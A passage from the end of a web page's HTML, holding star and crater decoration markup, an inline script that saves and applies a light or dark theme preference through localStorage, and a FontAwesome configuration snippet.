      <span class="crater crater--2"></span>
      <span class="crater crater--3"></span>
    </span>
        <span class="star star--1"></span>
        <span class="star star--2"></span>
        <span class="star star--3"></span>
        <span class="star star--4"></span>
        <span class="star star--5"></span>
        <span class="star star--6"></span>
    </label>
</div>
<script type="text/javascript">
const theme = localStorage.getItem('theme');

if (theme === "light") {
    document.documentElement.setAttribute('data-theme', 'light');
} else {
    document.documentElement.setAttribute('data-theme', 'dark');
}
const userPrefers = getComputedStyle(document.documentElement).getPropertyValue('content');

function activateDarkTheme() {
    document.getElementById('theme-toggle').checked = true;
    document.documentElement.setAttribute('data-theme', 'dark');
    document.documentElement.classList.add('theme--dark');
    document.documentElement.classList.remove('theme--light');
	document.getElementById("theme-toggle").className = 'light';
	window.localStorage.setItem('theme', 'dark');
}

function activateLightTheme() {
    document.getElementById('theme-toggle').checked = false;
    document.documentElement.setAttribute('data-theme', 'light');
    document.documentElement.classList.add('theme--light');
    document.documentElement.classList.remove('theme--dark');
	document.getElementById("theme-toggle").className = 'dark';
	window.localStorage.setItem('theme', 'light');
}

if (theme === "dark") {
    activateDarkTheme();
} else if (theme === "light") {
    activateLightTheme();
} else if  (userPrefers === "light") {
    activateDarkTheme();
} else {
    activateDarkTheme();
}

function modeSwitcher() {
	let currentMode = document.documentElement.getAttribute('data-theme');
	if (currentMode === "dark") {
	    activateLightTheme();
	} else {
	    activateDarkTheme();
	}
}
</script></div>
  </div>
</footer>


<script>
      window.FontAwesomeConfig = {
        searchPseudoElements: true
      }
    </script>
  </body>

</html>
